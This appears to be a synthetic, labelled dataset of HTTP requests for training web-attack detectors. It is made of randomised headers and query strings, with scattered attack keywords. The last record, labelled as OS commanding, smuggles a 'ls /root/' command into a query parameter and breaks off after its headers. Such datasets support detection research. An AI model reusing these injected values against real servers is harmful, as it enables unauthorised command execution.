Cache-Control: no-cache
Client-ip: 234.95.167.71
Cookie: dna8=i;nacmPh9gn6tr=';AjvEvar=36335
Cookie2: $Version="2"
Date: Fri, 20 Jan 06 08:40:58 GMT
ETag: "MLO5o.MWGTcwAKH2E"
Expect: eta19ag=sdt2Asla
From: whodpi@rrheriuA.net
If-Modified-Since: Fri, 12 Mar 04 08:30:43 UTC
If-Unmodified-Since: Tue, 28 Feb 06 08:58:43 GMT
If-Match: "O7R1Uee@w6NwM6nWE"
If-None-Match: "t.FxVG.n7SP9q.4jm"
If-Range: *
Max-Forwards: 9
MIME-Version: 5.8
Pragma: i='nsss'
Proxy-Authorization: NTLM ZXI5aW5vc2VsdHJadGxldmVnYXJlZWFvYXVrczYxaXhPaXRlOA==
Authorization: Basic ZW42bGEybzpzZnRhdQ==
Range: 301875-45,510153-7
Referer: http://0tr0hri.uk/hqeiNs1/ei6ebe/tDit2.php4
TE: gzip
Trailer: Via
User-Agent: Mozilla/8.1 (X11; U; Unix 8.6; no-Cl; rv:0.4.0) Gecko/48826151
UA-CPU: PowerPC
UA-Disp: 421,960,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9010x724
Via: FTP/7.2 www.Rsnie.shtml
Transfer-Encoding: identity
Upgrade: ejskmd/8.1, itcsut/3.9, ooo/5.9
Warning: 693 www.eetix.jpg "disicab5cesf" "Tue, 14 Aug 07 21:20:16 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 850343
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41912
Start - Id: 26708
class: Valid
GET /loewhAimy1giecio4u3m/bN/huxr7HFB/deoertucmhe/wget9XFGcIv@.htm?7rO1Iymteee=dhc&btU4u=e6sehman&ugo6a062iasoev8=9877&goprffRSe7b=bgsoundeti&sazers=ho&vSoe=831&5oghtr0eDA=276704&xnvs=uninclude&areplaceX_Rhobject=ioboot.inietne7%24a&mxtv22=at8 HTTP/1.0
Host: www.no4orgoTsu.st
Connection: close
Accept: audio/*;q=0.0
Accept-Charset: cp-950;q=0.6
Accept-Encoding: identity;q=0.3, compress;q=0.7, deflate, identity;q=0.4, deflate;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 41.69.153.49
Cookie: crg6S_libFtHl=v9txtermhome tusdrradrop+ dstO;iaysN=il50h_fa-0
Cookie2: $Version="00"
Date: Sun, 04 May 08 04:41:26 CET
ETag: "T8@J8mWCMvFmLewuG"
Expect: 100-continue
From: erpEn@cctbogs3k.biz
If-Modified-Since: Sun, 18 Sep 05 18:01:33 GMT
If-Unmodified-Since: Tue, 08 Feb 05 16:05:31 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 16 Oct 06 23:10:49 GMT
Max-Forwards: 354
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Xtgt8g gueh9=jopucso
Authorization: btporI teCo=uain
Range: -33274,02764-,88-035
Referer: /aiterr2i.doc
TE: trailers
Trailer: Accept-Charset
User-Agent: ndnisyW6/1.5.0.9
UA-CPU: 68000
UA-Disp: 221,658,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 231x546
Via: 7.4 11.171.211.237:0, 5.9 151.50.202.70:96642
Transfer-Encoding: gzip
Upgrade: xu4y/7.3, 8gru8/4.9, iehAs/2.8, a3va/9.5, cwa/8.5
Warning: 701 254.222.86.217 "saaI2btmra" "Wed, 03 Jun 09 17:45:34 GMT"
X-Forwarded-For: 241.3.2.199
X-Serial-Number: 838236
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26708
Start - Id: 21849
class: Valid
GET /lsgi/Nve2orfrn4Hnt/oMOl1QR63G81JD4/cLp1ymI7cZKQ7Bw/o0zn9E1hFhQ36pACK/lK4CCzUP00EZ5/ndcojmlnuealow.html? HTTP/1.1
Host: www.HnRtoid.org
Connection: r9rstsdi
Accept: text/*;q=0.5, application/*;q=0.8, image/jpeg
Accept-Charset: windows-1252;q=0.8, windows-1252;q=0.0, x-mac-icelandic;q=0.9, euc-kr;q=0.8, iso-8859-6;q=0.8
Accept-Encoding: *
Accept-Language: ywye3-u
Cache-Control: car='oetnn'
Client-ip: 210.60.139.221
Cookie: VAlbr3OkC_v=0
Cookie2: $Version="89"
Date: Sat, 12 Jul 08 10:33:43 CET
ETag: "DpZG8S_jp6uugUZ"
Expect: 100-continue
From: rayngcn@4eotaro.net
If-Modified-Since: Mon, 09 Feb 09 15:16:15 CET
If-Unmodified-Since: Sat, 15 Mar 08 20:51:14 GMT
If-Match: "fh7i..ERGXzcwvzL"
If-None-Match: *
If-Range: Sun, 15 Jun 08 12:32:02 CET
Max-Forwards: 029
MIME-Version: 0.9
Pragma: osby=h
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: Digest cnonce="etej6"
Range: 24-5050
Referer: http://tneleSzn.cz/eeeA.jpg
TE: trailers,deflate;q=0.5,trailers
Trailer: Connection
User-Agent: Mozilla/7.5 (X11; U; Open BSD i586 6.2; ef-3j; rv:3.2.3) Gecko/60178460
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3901x4660
Via: HTTP/3.1 179.108.95.224
Transfer-Encoding: compress
Upgrade: ehlec4/7.5, etieo/5.3, 3cri9/3.1, neAm/6.9, neum/3.4
Warning: 997 www.ios1c.shtml "Bp9SmhaeNdm3asqAoleh" "Thu, 27 Mar 08 03:11:30 GMT"
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 202474
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21849
Start - Id: 32666
class: Valid
POST /rtakJuMZz@aZV2/pcy/eibmntNeghusin/arnni46u.htm? HTTP/1.1
Content-Length: 144
Content-Language: cooi,oelitge,5gaioruc
Content-Encoding: compress
Content-Location: /sbnctct/heimb6h/tTyiu9/Edtha/eidd.png
Content-MD5: aWlraWY5aGtwYmFuaW16Yg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 07 May 07 01:47:22 UTC
Last-Modified: Tue, 08 Dec 09 04:24:26 GMT
Host: 224.213.225.17:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: c8tehbta-acigRle, nhhifLo-eg2;q=0.0, 3cheo-w7nor, teew-up;q=0.9, 14pa-rc
Cache-Control: no-cache
Client-ip: 34.63.246.176
Cookie: vBB6ipe=tKGPVR9ua;umutmnaegnorrca=8;is=w2WsmTt;MOe6ruetLm=5;62lfXD=systemm
Cookie2: $Version="661"
Date: Tue, 06 Jan 09 04:45:57 UTC
ETag: "Yzl4b4IbuCHah_fU0Zl"
Expect: h5Ft=0xs6cdt3;rdeT5hoe
From: t8whu@dszw.biz
If-Modified-Since: Sat, 11 Nov 06 08:40:39 CET
If-Unmodified-Since: Thu, 21 Jun 07 10:00:53 GMT
If-Match: "U220sLzxvqGXM1S"
If-None-Match: "rKJwXbUdsZ54U4Es"
If-Range: "so7PKmc-IyEwd6G5p"
Max-Forwards: 2305
MIME-Version: 8.7
Pragma: l9trtdh=d6
Proxy-Authorization: nsaea Rbis=Iad6tiRh
Authorization: Digest cnonce="ssegn"
Range: -183900,9-,-702
Referer: http://o2cstt.org/7cssr/tecs/tnsatrl.wav
TE: gzip,trailers
Trailer: Host
User-Agent: nC_mtt1S http://www.lo5od.be
UA-CPU: PowerPC
UA-Disp: 530,9577,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 853x924
Via: FTP/9.8 49.156.101.61
Transfer-Encoding: identity
Upgrade: bes/5.0
Warning: 732 66.142.105.251 "rwaRrsaIalqta" "Sun, 12 Jul 09 20:33:14 CET"
X-Forwarded-For: 52.89.151.232
X-Serial-Number: 234338027352713339
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ettchi=09325028&yRGtaccess_logcT9=6&esFyi=6b0oe&.P-netcatgS9ixfr=~auuxml a1afiframetFI&e6optermcss=4585&cxmrEteso5eeg=my~&aow6drL0l=CAsoaaeh

End - Id: 32666
Start - Id: 14763
class: Valid
GET /hD8dmuxpajRs5GDc/75/uSRTenYtt/7BfTgVRNchKUS2K@d/afetshoFiseosdtwse/flndd9adbsuees/letripveoebxtor/mKu/1WoeIei/teoyry8t1bemwsw/hdaJd/hPDISYgfDfjhgs_g.aspx?b3e5BmrtaaNaWeb=sQeT8m&Too=h1%3Ewindow.openlike&dropxIxzjv=sest%3BeS%3Fi%5Dr%24%28e&a488dtgm4aFnw=2&9tlLlsdkimu=%29%5Cg&eseo48ere=dnjnpHiee&dt8n=ertee+ao%3EmEut&gema8s7h=63&copyGj-Abodyrperl=Zrnanxacf&qmbljR=26Qoetfo&1bsbdoe6n=yo3e6fttdiehn&srtawtn=03&nlqkqlne=o1gjI4V&b0afeCk0d=1WHet6hnw&VLq_rlE=it HTTP/1.1
Host: 132.58.239.227
Connection: MTtfigw
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 2.100.18.32
Cookie: h@objectuE98x9sEx=eierhuoe=vbscriptt;afnr=eaP%put1sotccat;i
Cookie2: $Version="417"
Date: Mon, 02 Mar 09 13:08:13 CET
ETag: "nJCe5uVoKP3XPZpF"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Wed, 19 Aug 09 14:01:55 UTC
If-Unmodified-Since: Sat, 24 Jul 04 20:23:09 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 05 Mar 07 04:10:03 CET
Max-Forwards: 6
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: el3ew eon38=myylbi
Authorization: NTLM RWVhNGhub2VubWduOGUycGRtZnNpZW9rc2xlZXJ0bzNwbGVlbm10
Range: 31145-
Referer: /rlgmtrt/aMdari2d.mspx
TE: trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/9.0 (Machintosh; U; Mac OS X 9.4; in-sd; rv:7.2.9) Gecko/19420180
UA-CPU: Sparc
UA-Disp: 1839,4933,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 888x837
Via: 6.1 www.ogtss.html, eti/6.9 www.onul.png:330
Transfer-Encoding: 3nkafo; rtezhy=r1ta27r
Upgrade: bHo/6.3, 1iTaa/1.7
Warning: 535 www.WEsie.png "n0eI9" "Sun, 21 Dec 08 09:51:07 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 6750967097999329
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14763
Start - Id: 22356
class: Valid
GET /IRcehEnvE9epaIjx8i/OJ8nE@/r1AZD9gl2w5TQlf/i9pt7aai6Id8whn5scSc.jsp?v0HpGyxLSRcM=eua&bnectae=h5Pk9O3OnKa&uKifS7group byo=31140&ai=29&niern=i1sot&58XeUadminq6q=4null6&obmfutdez=28187905&d5ieehnuiR=70613&l7_Ghtpasssia8VtF=wrsM2ilikee%28Gasuhei%3Eqw&a37P989a76Gc=e3hrhBno0ahtxso&iyaebeaAeoTnoht=14858&@@Qx_Va=291 HTTP/1.1
Host: 184.12.22.107
Connection: qautnqie
Accept: */*
Accept-Charset: x-mac-chinesesimp, iso-8859-4, cp-950;q=0.7, koi8, utf-8;q=0.3
Accept-Encoding: 
Accept-Language: netheR-boce, ed-0iikne;q=0.9, ecw-ex8kolhT
Cache-Control: no-transform
Client-ip: 169.90.69.255
Cookie: oa=08;molrtoonltdStex=A ;cnmpc=7hatW9sdnO;i6dseoostnmsa=bH25;yo2noaYe=t%idC;cwJJautoexecIV=execshttpchildy3a=ilidneI)
Cookie2: $Version="50"
Date: Sat, 03 Apr 04 14:33:51 UTC
ETag: "yAA6PP6Zim0k7bUr."
Expect: efzrn
From: ehfibls1@lhrs6.org
If-Modified-Since: Thu, 08 Nov 07 24:35:57 CET
If-Unmodified-Since: Tue, 20 Nov 07 22:47:50 UTC
If-Match: *
If-None-Match: "GxV9dvHHvdtHvDgIIz"
If-Range: Sat, 31 May 08 20:24:23 CET
Max-Forwards: 159
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: NTLM TWRvTG51ZXloYWtpdnhyZWNzc3JkZXRpYWE3aGkyaW5pcjFh
Range: 324718-63,628-
Referer: /ejijnhh0/htoWe/etoe.php4
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/1.8 (Windows; U; Windows NT 1.2; at-oE; rv:9.2.0) Gecko/70046604
UA-CPU: 68000
UA-Disp: 369,681,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3373x300
Via: ipsmc/7.5 243.49.74.189, UOiet/1.0 www.dmriuq.htm
Transfer-Encoding: esle
Upgrade: aos/2.3, onrpu/3.4
Warning: 860 www.cneasowg.jpg:0858 "rgda4" 
X-Forwarded-For: 56.17.27.167
X-Serial-Number: 570685869927204
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22356
Start - Id: 19016
class: Valid
GET /mmNmuQ@bgHhaW7rui/holeodokero2u/borMNU@Z6Rdy/hB.Yo36LUQ9d/demBAajYaIDbLp55vcpe/lzwaCova.htm?lolase7m=3pI&4a9itlrntea=axpeewtlv9nLaIhl&eccvzilt6=t%26 HTTP/1.1
Host: 3.196.112.22:29659
Connection: gtprf
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.2, windows-1252, x-mac-chinesetrad, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-age=61
Client-ip: 203.235.99.136
Cookie: rac3exafu7Ea9=eq:yd4 ndamNanA;cya2u=dS_7tn;EKgu=0909830;bat5rdoe=lemIe:;awrcsqro=73950864;teReK==kccwslPuR
Cookie2: $Version="62"
Date: Thu, 01 Jun 06 17:36:32 UTC
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 8ee5fjqi=chyktiir;0ineeln
From: Priuift@eiTp29Uz.ch
If-Modified-Since: Thu, 19 Jan 06 22:07:01 CET
If-Unmodified-Since: Wed, 14 Jan 04 24:37:41 GMT
If-Match: "sAKLid4RfUVItOwj"
If-None-Match: "EUUtRwKgJ-lgqQ9jCO"
If-Range: Wed, 27 Aug 08 07:57:47 UTC
Max-Forwards: 2
MIME-Version: 8.1
Pragma: ldezo=mH
Proxy-Authorization: s4dHh n7hsa=euolh8g
Authorization: Basic Z1JudGM6ZTl5YQ==
Range: 002-0467,62-
Referer: http://www.ih1sb.fr/nnaRs/daaarua/pnode/ryxtr2ua/raokem.cfm
TE: gzip
Trailer: User-Agent
User-Agent: TgfYehjn/8.8.4
UA-CPU: MIPS
UA-Disp: 017,5137,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: 5.4 185.93.218.93, 6.3 www.haye.jpg, 7.9 6.21.138.251
Transfer-Encoding: deflate
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 097 131.235.92.163:74694 "1HrdrfsFeisainaJx" "Tue, 01 May 07 01:17:00 CET"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19016
Start - Id: 9261
class: Valid
GET /aQU/el0jxulrnieonj/getd/tViSta/TrhMuesqyaacThyNa7o/irGi2f3L_yuw/bZh/nrxahrGDeNeQe/fNLaBZl.jpeg? HTTP/1.1
Host: 250.193.25.149
Connection: Tic4el
Accept: audio/*
Accept-Charset: utf-7, utf-8;q=0.6, windows-1258;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 126.233.178.83
Cookie: hkd7atid=ny2Maasmett;syed=U;-;itSoceht=0;ngohein=r2UsS;tytlbc5nlfgnbeV=lqm0ierhaHodt;haq0nhtaEurnad=3a@window.open
Cookie2: $Version="49"
Date: Wed, 25 Feb 04 11:39:00 GMT
ETag: W/"W5s9es_Mp56sfl0"
Expect: 100-continue
From: vsdit@a9hosdr9ad.fr
If-Modified-Since: Fri, 21 Jan 05 09:57:03 UTC
If-Unmodified-Since: Sat, 09 May 09 18:31:45 UTC
If-Match: *
If-None-Match: "@bh0vsaN33Hg@HklFWxK"
If-Range: Thu, 06 Aug 09 04:21:37 CET
Max-Forwards: 317
MIME-Version: 4.6
Pragma: aade='ftain'
Proxy-Authorization: NTLM ZWdkc2hvVGhIc0U4ZWhhYWNlc2VhZWJsbkF0c25vaG91
Authorization: neofc er5enlra=tieenou
Range: 30-703,-64,-521
Referer: http://k9tsq.uk/eaeo/6keo/dlimtnld.pdf
TE: trailers,trailers,deflate
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 2.7; oA-ed; rv:0.3.4) Gecko/00030891
UA-CPU: 68000
UA-Disp: 2373,285,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 476x394
Via: FTP/2.3 www.eeh0ptia.gif:9, HTTP/4.7 118.57.133.179
Transfer-Encoding: identity
Upgrade: te6hij/6.9, n6aen/3.6, ae9/5.4, c8eog/3.3, hbdo/6.2
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 118.223.215.97
X-Serial-Number: 38374
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 9261
Start - Id: 2592
class: Valid
GET /eljrCh2FJHy_mjTNS/c0doedhtn/aeyQxmsRi-R7cgDk/tmpwzI6LN3Qsock_stream/7ofq.25/xBX.KGWuxm8RC/hrSksbohonorh9arI/eloB2nlaeiyt/rbnlhloDeyEynolw/hkdstoitnr/MsnenN1c/6YKstdin.HR4xp_IsB.dll?seeauUsie=%7E&2clt9ta=1486683855&temnlrGunntlh=0&bRG1MsqHv8=xg&CdBBOo=152047&tTzia3=o7JOQ%40AXJw&h6akoruHl4s4N=atTBMKvr&BspHstcstD6=62178698&kcDOm=7644&hnhrEbra=6ara+i&laeMO7F3zperl0.=a&z4T51q=up&mWTwd_eXP=5050451&szhininsertucatelnxH=rsigtperlha&lsine=6289992 HTTP/1.1
Host: www.epsnnegr.it
Connection: close
Accept: */*
Accept-Charset: euc-jp, x-mac-turkish;q=0.9, x-mac-roman, hz-gb-2312;q=0.5
Accept-Encoding: compress;q=0.2, gzip
Accept-Language: *;q=0.5
Cache-Control: no-store
Client-ip: 238.63.139.169
Cookie: yaeig7h3sfTe=zSyo;a8=nTXDko
Cookie2: $Version="56"
Date: Thu, 31 May 07 18:21:11 CET
ETag: W/"P66bts1whz9tBiEI"
Expect: 100-continue
From: nenonte@ily8ueedor.uk
If-Modified-Since: Sat, 23 May 09 18:21:06 GMT
If-Unmodified-Since: Wed, 05 Sep 07 08:40:10 GMT
If-Match: *
If-None-Match: *
If-Range: "nomk-AcU2YlUlJgRg55"
Max-Forwards: 4038
MIME-Version: 0.1
Pragma: rd='4lesetsb'
Proxy-Authorization: NTLM c2dzeVRldW5ONFdlZW1peXZlbnNzbGJ1c3V2bTJvTXg=
Authorization: awk5 t2nbis=ltmdL
Range: 9-6,46-1
Referer: http://2udeoaiw.ch/1eAn/eqqzg6w.txt
TE: gzip;q=0.3
Trailer: Referer
User-Agent: Mozilla/5.2 (compatible; MSIE 0.6; Solaris; b4eBfzel; 5jtKrc)
UA-CPU: PowerPC
UA-Disp: 9744,1465,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 440x033
Via: 1.7 www.caovb.png
Transfer-Encoding: svie
Upgrade: hutie/7.1
Warning: 852 www.tmttloo.html "nksortaobujtnde9N" 
X-Forwarded-For: 254.65.44.244
X-Serial-Number: 77079667
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 2592
Start - Id: 15889
class: Valid
GET /4oKUj/lJ03qcdnl6l8gEl/aet8s/91BVperl5rVqQJZ/yenheThabioixtrtsrc.html?inOaoUa9XnEtjT=84923 HTTP/1.1
Host: www.PuXuAsAea.fr
Connection: n2oky6
Accept: application/*
Accept-Charset: iso-8859-5, iso-8859-1, x-mac-turkish
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 188.12.243.240
Cookie: nxoaetmn=zs;Eerookseg=fTINWug;ebinTEUser5ieo=92049
Cookie2: $Version="675"
Date: Sat, 11 Nov 06 11:19:12 GMT
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: bnwaa=srawoA
From: 1nNrdio@oirSyea.com
If-Modified-Since: Sat, 17 Nov 07 07:58:49 UTC
If-Unmodified-Since: Tue, 18 Apr 06 04:49:53 UTC
If-Match: "0d0ttCXd1FXWIlBD-"
If-None-Match: "AFbx21X50O.RxYjj"
If-Range: *
Max-Forwards: 810
MIME-Version: 5.5
Pragma: xiEcn='3l7s'
Proxy-Authorization: nogyu eet8g=aNnn
Authorization: Digest qop=usid
Range: 141-7620
Referer: http://www.kiatCrm.be/psoj1u/frenc.nsf
TE: trailers,deflate,trailers
Trailer: Host
User-Agent: eIboTNNBCQ http://www.iaI5.de
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 664x941
Via: 7.4 147.211.54.221
Transfer-Encoding: d6pi
Upgrade: afum9l/8.2, fEaii8/5.9, som/7.2
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 495532176106
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15889
Start - Id: 25961
class: Valid
GET /sjgApOyslihsiyeix/aaeem7n/tlrhtr96dme/Iydnfes1dfrtjs/NUchilddjViq5S/e3/yIHA9bLBpI@.Wu/2fXlotelnetChqH/odo6ba6o/i1Onlf1andSoh.swf?NtFdiopt=hAcG&a6nsrhscolydio=7380&dlibyFE1qv4E=shiacceptk&xenis=aacceptuhpasswd&aobEe5onrdeeSPi=fat%26tu%3Eli8te&dvmYxrvEtre=tSo&aayshitsrdtRusa=rpzdHPfeeNhR&bpkeoiukrK=%24eesschildlWtts+tleh%5D+&eoaaltdnc=629232204&Oienethso2jar=nlogi&huerroensHyflpo=oV8fPM&op3od2sma7=oux%28qtzso&Xine=tqrh%3Engoeo HTTP/1.1
Host: 18.23.79.169
Connection: keep-alive
Accept: audio/basic;q=0.8
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.1
Accept-Language: n7mdapp-nketkium, sea-mt, ntoht0c-n, nnu-ststsriA, ish-exhs2l;q=0.0
Cache-Control: only-if-cached
Client-ip: 24.235.222.46
Cookie: KkVo-a6E794r=1752321;fnm=827938023;2asvth=e6tqaeeEdcn;UyPsessnetnC=95594;erhrEzmn=om i'
Cookie2: $Version="4"
Date: Sun, 23 Oct 05 15:05:12 UTC
ETag: W/"wo3tumGbCtZlZ-PW4n"
Expect: 100-continue
From: tztba@mlyibacoy2.cz
If-Modified-Since: Sat, 12 Mar 05 14:54:02 CET
If-Unmodified-Since: Thu, 06 Nov 08 11:56:37 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 1.4
Pragma: eN7p=s
Proxy-Authorization: dq3Bsa A2qrtl=9wki
Authorization: rtsr 0dSh=iih9
Range: 041-
Referer: http://www.6ytsCllE.com/ioewnyt7/hnkc1nr/nmestrW.js
TE: trailers,trailers
Trailer: Host
User-Agent: dsnmttdcih/7.3
UA-CPU: MIPS
UA-Disp: 3281,342,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5187x1770
Via: 5.0 90.223.198.147, FTP/8.9 www.ofay.gif, HTTP/5.5 45.211.9.195
Transfer-Encoding: tmpmm; Oorn=5hes
Upgrade: ci5/2.9, wetema/8.5, v8el3/8.4, izrs/8.5
Warning: 432 www.i3ei.js "ertmdUhs2iS" 
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 7358470
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25961
Start - Id: 25652
class: Valid
GET /U1CcatM7N./onxvo8/lUC/Enr1gasD2wooo/0ydphwfWlagt40/Ilinkwy.-Q5VcatJo/ueobpteSc/ooMmtdtNobocle/pEmqUi0/t1Tzalreo4n.gif?Tcpteiy=76&r8hotnoiwt=827899218&bmetaGi869hEeQ=75422038&enaaeo5b=0havingen&Clihtn=2 HTTP/1.0
Host: www.eteqresws.uk
Connection: smPLy
Accept: */*;q=0.1
Accept-Charset: windows-1258, iso-10646-ucs-2, macintosh, hz-gb-2312, big5;q=0.1
Accept-Encoding: 
Accept-Language: n-etrte3h;q=0.0, j3igsnr6-nlre, igh-Rflne2ti;q=0.5, esfy-do67
Cache-Control: only-if-cached
Client-ip: 163.112.170.136
Cookie: ntrb=htirdznhiuryBdusi;iitjrz=atonzn6lniea7doi;eriiesct8=n4I;4r=64;aoinyAedojCwf=660328
Cookie2: $Version="0"
Date: Wed, 28 Feb 07 11:53:11 UTC
ETag: W/"7eTfVhdTQmnM5XVe75"
Expect: 100-continue
From: ma49@uare.ch
If-Modified-Since: Sun, 04 Apr 10 06:09:17 GMT
If-Unmodified-Since: Mon, 27 Aug 07 22:29:13 GMT
If-Match: *
If-None-Match: "Bh0y1@pQB-f3UF2a"
If-Range: Sat, 18 Apr 09 04:20:06 GMT
Max-Forwards: 1
MIME-Version: 6.2
Pragma: el4bec75=res
Proxy-Authorization: Digest nonce
Authorization: Digest nc=cECD7cB1
Range: -55
Referer: /ttegsln.mp3
TE: deflate,deflate
Trailer: Range
User-Agent: ifdeczwseot9orNoua78
UA-CPU: 68000
UA-Disp: 349,527,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8213x490
Via: HTTP/8.2 39.3.163.68
Transfer-Encoding: gzip
Upgrade: t4l/3.7, neThay/6.0, otri/7.6, oraT/8.6, imnM/8.2
Warning: 849 www.a80e.jpeg:2725 "efl1xbzhwbe" 
X-Forwarded-For: 7.72.51.122
X-Serial-Number: 33104741
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25652
Start - Id: 7771
class: Valid
POST /pt/kb9fQbHUnD/eeOm3undnsm3iipq.swf? HTTP/1.0
Content-Length: 121
Content-Language: tu,o,e
Content-Encoding: compress
Content-Location: http://www.epaeo0er.org/igrEde.mdb
Content-MD5: aW1taW41MDF1aWl1b1Jlaw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Feb 09 08:10:22 GMT
Last-Modified: Mon, 27 Aug 07 23:53:09 CET
Host: 138.125.228.30
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: iso-8859-1, iso-8859-4
Accept-Encoding: gzip;q=0.2, deflate
Accept-Language: hpnoo-Shim7
Cache-Control: max-age=9
Client-ip: 200.184.5.24
Cookie: 8RoSs7ur1o=wyDLmifHNsZ4;_o3NP=rge
Cookie2: $Version="76"
Date: Sun, 08 Jan 06 22:58:03 CET
ETag: W/"8RQB1Qe.P@oXtZte.vHq"
Expect: 100-continue
From: igeu@eoSi.st
If-Modified-Since: Tue, 06 Mar 07 10:37:45 GMT
If-Unmodified-Since: Tue, 19 Feb 08 20:43:08 CET
If-Match: *
If-None-Match: *
If-Range: "xhEUtX.XuuaAuaLtK4"
Max-Forwards: 9926
MIME-Version: 2.6
Pragma: 8urdLcee='erq5lee'
Proxy-Authorization: eote tt3r=ttotib1
Authorization: Basic dHNoamU6cHJzYw==
Range: 22-
Referer: http://zS3ann.org/mhwp/xsnTTs.mdb
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.6 (compatible; tsimhaid; WinNT; nihn)
UA-CPU: StrongARM
UA-Disp: 761,954,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 782x104
Via: 9.2 14.153.147.69:9958, WteiNe/3.1 137.55.32.96
Transfer-Encoding: compress
Upgrade: etdnet/8.2
Warning: 810 141.222.234.142 "zmnweaewonEakBetbj" "Sat, 23 Jan 10 20:21:52 CET"
X-Forwarded-For: 246.243.72.110
X-Serial-Number: 575735447
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eRn=gcnnhn&tiqWLaohodImt=17162699&3a4=e )esf3n (na&obiH=489075640&w_k.qRIL=0273246519&mscLtl=bsz&uEgeshohepvIaa= 7ojh

End - Id: 7771
Start - Id: 43450
class: OsCommanding
GET /oeiStffEt/Nnn0vl2yTe/ei49imdnPinr1TE/VYBR4KBCmetaS6o/l@TC3t0likeZn/ncK.TFuw@feZsrV4bn/tp.shtml?di2enanoit=034217124&gnqtea0lD=057&14GEKlg=aioshqi&amee8x23tste=85525&MTMconnectW-MZ4_=+&hs=cSameho&hhasq3ghle=930795&hdryT2Irvne=os&meel3qeoetno=e+au&egyt9yederinz=568263&bqf65c3k8g8=%5Cnls++%2Froot%2F&ehaacu=heen&oLheocsdEnmu=o%25+%40Iueto+stylerh&os9bsfdayg=3 HTTP/1.0
Host: 116.26.183.109:1385
Connection: close
Accept: */*;q=0.5
Accept-Charset: windows-1253;q=0.9, iso-8859-9
Accept-Encoding: *
Accept-Language: t1-jw, oeeky-ltsesem;q=0.6, D-5dwatEll, eoeaa-kj;q=0.1
Cache-Control: no-store
Client-ip: 62.234.202.158
